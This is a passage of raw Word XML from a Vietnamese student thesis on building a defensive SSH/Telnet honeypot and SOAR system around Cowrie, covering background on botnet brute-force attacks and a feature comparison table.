      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="53751F40" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0894C76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4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EB1923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Danh sách các Module mã nguồn và Trách nhiệm xử lý trong Hệ sinh thái</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D42B70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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="3EDA0EBE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F3CB69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5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="673483C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Tổng hợp kết quả kiểm thử 4 kịch bản tấn công Red Team giả lập</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64AF945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35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="7D0356C0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E7459A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5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60A0323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đo lường hiệu năng và mức tiêu thụ tài nguyên phần cứng hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CB3139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37</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="757D953C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04240E4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5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="764527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Top 10 Quốc gia và Dải mạng phát sinh lưu lượng tấn công SSH nhiều nhất</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="560AC03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39</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DD31E06"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5733B680"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75ED431C"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1: TỔNG QUAN VÀ ĐẶT VẤN ĐỀ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34779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 xml:space="preserve">1.1 Bối cảnh </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ninh mạng và Thực trạng Tấn công Dịch vụ Truy cập từ xa (SSH/Telnet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DDB85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kỷ nguyên chuyển đổi số và bùng nổ hạ tầng điện toán đám mây (Cloud Computing), dịch vụ Secure Shell (SSH) và Telnet đóng vai trò là xương sống trong việc quản trị, cấu hình và vận hành hệ thống từ xa của hàng triệu máy chủ, thiết bị mạng và hệ thống IoT trên toàn thế giới. Do cổng mặc định TCP 22 (SSH) và TCP 23 (Telnet) bắt buộc phải mở công khai để phục vụ nhu cầu quản trị từ xa, đây luôn là mục tiêu hàng đầu bị các mạng máy tính ma (Botnet) và các nhóm tội phạm mạng nhắm đến để thực hiện các chiến dịch xâm nhập ban đầu (Initial Access).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F600E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Theo các báo cáo an ninh mạng toàn cầu gần đây của các hãng bảo mật lớn như Fortinet, Palo Alto Networks và Microsoft Threat Intelligence, hơn 85% tổng lưu lượng rà quét trái phép trên Internet hướng về các cổng quản trị từ xa. Các cuộc tấn công này diễn ra với tốc độ chóng mặt và hoàn toàn tự động, được điều khiển bởi các biến thể mã độc botnet nguy hiểm như Mirai, Gafgyt, Tsunami hay Muhstik. Những botnet này liên tục thực hiện chiến dịch dò quét địa chỉ IP toàn cầu (IP Sweeping) và thực hiện tấn công dò quét từ điển (Dictionary Brute Force) với hàng ngàn cặp tài khoản/mật khẩu phổ biến nhằm chiếm quyền điều khiển (root compromise) của máy chủ mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D7E3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Hậu quả của việc máy chủ SSH bị xâm phạm là vô cùng thảm khốc: kẻ tấn công ngay lập tức biến máy chủ nạn nhân thành một bàn đạp nội bộ (Pivot point) để leo thang đặc quyền (Privilege Escalation), cài cắm mã độc đào tiền ảo (Cryptocurrency Miner), đánh cắp dữ liệu kinh doanh quan trọng, triển khai mã độc tống tiền (Ransomware), hoặc tuyển mộ máy chủ đó vào mạng lưới botnet để phát động các đợt tấn công từ chối dịch vụ phân tán (DDoS) quy mô terabit nhằm vào các hạ tầng trọng yếu khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F5406"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1.2 Sự bế tắc của Mô hình Phòng thủ Thụ động (Passive Defense) truyền thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB760C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nhiều thập kỷ qua, các chiến lược bảo mật mạng chủ yếu dựa trên triết lý 'Phòng thủ chu vi thụ động' (Passive Perimeter Defense) với các thành phần cốt lõi bao gồm Tường lửa trạng thái (Stateful Firewall), Hệ thống Phát hiện và Ngăn chặn Xâm nhập (IDS/IPS như Snort, Suricata) và phần mềm phòng chống brute-force cơ bản (như Fail2ban). Tuy nhiên, trước các chiến dịch tấn công phân tán quy mô lớn và đa hình của tội phạm mạng hiện đại, mô hình phòng thủ thụ động này đã bộc lộ những điểm nghẽn nghiêm trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780913E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Thứ nhất, vấn đề 'Bội thực cảnh báo giả' (Alert Fatigue): Các hệ thống IDS truyền thống dựa vào chữ ký tĩnh (Signature-based) liên tục sinh ra hàng chục nghìn cảnh báo mỗi ngày đối với các lưu lượng quét mạng thông thường. Chuyên viên an ninh tại các trung tâm điều hành SOC không thể nào rà soát hết lượng cảnh báo khổng lồ này, dẫn đến việc bỏ sót các cuộc tấn công thực sự nguy hiểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D5BB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Thứ hai, độ trễ phản ứng quá lớn (High Response Latency): Quy trình xử lý sự cố truyền thống phụ thuộc hoàn toàn vào con người (SOC Tier 1 Analyst). Từ khi hệ thống phát hiện có IP tấn công brute-force, chuyên viên phải kiểm tra thủ công log, tra cứu WHOIS, xác minh địa chỉ IP, sau đó mới truy cập vào firewall để thêm luật chặn IP đó. Toàn bộ chu trình này mất trung bình từ 15 đến 30 phút. Trong khoảng thời gian đó, kẻ tấn công đã có thể đoán trúng mật khẩu yếu hoặc khai thác thành công lỗ hổng bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C32F9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Thứ ba, sự thiếu hụt thông tin tình báo đối phương (Adversarial Intelligence Blindspot): Phòng thủ thụ động chỉ biết chặn và bỏ qua (Drop/Reject packet). Hệ thống hoàn toàn 'mù' về động cơ của kẻ tấn công: Kẻ tấn công là ai? Chúng đến từ đâu? Sau khi vào được hệ thống thì chúng gõ những lệnh gì? Chúng đang tìm kiếm tài liệu nào? Những mã độc nào được chúng chuẩn bị tải lên? Việc thiếu vắng hoàn toàn các dữ liệu TTPs (Tactics, Techniques, and Procedures) này khiến đội ngũ phòng thủ luôn ở vị thế đi sau kẻ tấn công một bước.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05F76B"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1.3 Khái niệm Công nghệ Bẫy Honeypot và Sự dịch chuyển sang Phòng thủ Chủ động (Active Defense)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1A0D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khắc phục sự mù mờ về thông tin của phòng thủ thụ động, công nghệ Bẫy (Honeypot) đã ra đời như một bước tiến quan trọng. Honeypot là một tài nguyên công nghệ thông tin được thiết kế và triển khai với mục đích duy nhất: trở thành một chiếc bẫy mồi nhử để kẻ tấn công xâm nhập và tương tác, trong khi toàn bộ hành vi, tổ hợp phím gõ, kịch bản khai thác và mã độc của đối phương đều bị ghi lại một cách bí mật và toàn vẹn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB4DB5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lĩnh vực giám sát dịch vụ SSH/Telnet, Cowrie được đánh giá là một trong những giải pháp Medium-Interaction Honeypot mã nguồn mở hàng đầu thế giới. Cowrie cung cấp một shell dòng lệnh ảo hóa hoàn hảo, giả lập hệ điều hành Linux Debian/Ubuntu với đầy đủ hệ thống tệp tin (filesystem), hỗ trợ các lệnh phổ biến (ls, cd, cat, wget, curl, ps, uname), cho phép ghi lại chi tiết từng phiên kết nối và tự động lưu giữ các payload mã độc mà kẻ tấn công tải lên máy bẫy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78501E2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Tuy nhiên, xu hướng phòng thủ hiện đại trên thế giới không còn dừng lại ở việc 'ngồi im chịu trận để thu thập log'. Các tổ chức nghiên cứu bảo mật hàng đầu như MITRE (với khung chiến lược MITRE Shield và MITRE Engage) đã khởi xướng cuộc cách mạng mang tên 'Phòng thủ Chủ động' (Active Defense &amp; Active Deception). Phòng thủ chủ động là sự kết hợp đồng bộ giữa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2A8A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Đánh lừa có chủ đích (Deception Operations): Dẫn dụ kẻ tấn công vào ma trận các thông tin giả mạo (Fake credentials, Canary Tokens), buộc đối phương phải tốn thời gian, công sức và nguồn lực vào những mục tiêu không có thật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D9FE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Trinh sát ngược (Reverse Reconnaissance): Ngay khi kẻ tấn công chạm vào bẫy, hệ thống lập tức kích hoạt các công cụ thu thập thông tin tình báo đối phương (OSINT, rà soát dịch vụ, phân tích chữ ký công cụ tấn công) để vẽ nên hồ sơ đầy đủ về kẻ địch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745D584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Tự động hóa phản ứng sự cố (SOAR): Đồng bộ hóa quy trình phát hiện, phân tích và ngăn chặn trong vòng vài giây mà không cần sự can thiệp thủ công của con người.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11A94A"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1.4 Phân tích và Giải quyết Nhận xét của Giảng viên: 'Vượt qua Giới hạn Cài đặt Ứng dụng Bề nổi'</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2"/>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48D8C601" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C984697" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>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rPr>
              <w:t>📌 LỜI CẢNH BÁO MANG TÍNH BƯỚC NGOẶT CỦA GIẢNG VIÊN HƯỚNG DẪN:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:iCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lời nhận xét của Giảng viên: 'Nếu chỉ đơn thuần là cài đặt Cowrie Honeypot theo hướng dẫn có sẵn trên mạng, sau đó viết một vài dòng script đọc file cowrie.json và bắn tin nhắn thông báo vào Telegram Bot khi có ai đăng nhập, thì đây chỉ là mức độ Cài đặt và Ứng dụng công cụ có sẵn (Script-kiddie / Application Configuration Level), hoàn toàn thiếu hàm lượng nghiên cứu khoa học, không có đóng góp về mặt kỹ thuật kỹ sư và chắc chắn không thể đạt điểm giỏi/xuất sắc.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F30E237" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="003C5386">
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5163274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Đây là một nhận xét vô cùng xác đáng và mang tính chuẩn mực học thuật cao đối với một đồ án chuyên ngành </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> toàn thông tin. Nhận xét này đã bóc tách rõ ràng hai mức độ tiếp cận đề tài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5C93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Ở cách tiếp cận cũ (Mức 1 - Cài đặt ứng dụng): Sinh viên tải Cowrie về bằng lệnh git clone, chạy docker-compose up, mở file log và viết 20 dòng code Python sử dụng thư viện requests để đẩy dòng chữ 'Có IP 1.2.3.4 đang tấn công' lên một nhóm chat. Cách làm này không giải quyết được bất kỳ bài toán cốt lõi nào của SOC: Không có bộ lọc tương quan (Correlation), không có khả năng chống chọi với bão cảnh báo (Alert Flooding), không ánh </w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>xạ được kỹ thuật tấn công theo tiêu chuẩn quốc tế, không có hành động ngăn chặn tự động, và đặc biệt là hoàn toàn bị động trước kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164622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vượt qua giới hạn đó và nâng tầm đề tài lên Mức độ 2 (Kỹ thuật Kỹ sư &amp; Nghiên cứu Khoa học Chủ động), đồ án này đã tái cấu trúc toàn diện bài toán và xây dựng một Hệ sinh thái Active Defense &amp; SOAR Ecosystem với 5 giá trị kỹ thuật vượt trội được thể hiện trong Bảng 1.1 dưới đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0317181E"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1.1: So sánh sự khác biệt bản chất giữa Cài đặt Ứng dụng Bề nổi và Hệ thống Active Defense Đồ án</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>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7296D96E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2804DA1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Tiêu chí Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D307E1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Mô hình Cài đặt Bề nổi (Bị Thầy chê)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2862D51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Hệ sinh thái Active Defense &amp; SOAR (Đồ án đề xuất)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="024743FB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="202042A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 chất Kiến trúc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10A8E31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Chỉ cài Cowrie đơn lẻ và script thông báo tĩnh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A1CE9E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Kiến trúc Mini-SOC 5 phân lớp hoàn chỉnh, tương tác đa thành phần.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="6148CB36" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0307929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Cơ chế Xử lý Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5490146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Đọc log tuyến tính, gửi tin nhắn thô liên tục (Spam).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="366BD14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Bộ phân tích luồng JSON bất đồng bộ (Streaming Event Engine).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="6476F597" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40A8D3D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Động cơ Tương quan (Correlation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27D30D2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có. Một sự kiện failed login cũng gửi alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66ABB62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Correlation Engine tự phát triển, ánh xạ tự động ma trận MITRE ATT&amp;CK.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="12A195B6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42B887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Mức độ Tương tác Cảnh báo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C2E992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Thông báo 1 chiều tĩnh (Plain text notification).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62B69C9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Thẻ cảnh báo trực quan + Inline Buttons tương tác 2 chiều (Chặn, Quét, Tarpit).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="59CBA103" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BF9269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Khả năng Trinh sát Ngược (OSINT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0049F63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Hoàn toàn không có. Không biết IP là ai.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3076D4B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Reverse Intel Engine tự động query AbuseIPDB, Shodan API, quét cổng an toàn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="4BA23E3E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73ECD63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Phòng thủ Chủ động (Deception)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FE2EBE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Honeypot mặc định, hacker dễ phát hiện chữ ký.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F81A4F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Tùy biến Filesystem chuyên sâu + Gài bẫy Honeytokens (Canary de-anonymization).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="2A847D22" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A3AB84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Phản đòn &amp; Tiêu hao Tài nguyên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29BD2B6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có. Attacker quét thoải mái.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5936E88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Kỹ thuật Tarpitting (Giam lỏng kết nối, làm treo thread tấn công của Botnet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="08367DBC" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37C14A4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tích Mã độc (Malware Staging)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D4A95B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Chỉ lưu file vào ổ đĩa, không làm gì thêm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="015DD81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Payload Analyzer tự động trích xuất SHA256, IOCs và tra cứu VirusTotal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="64D29D22" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
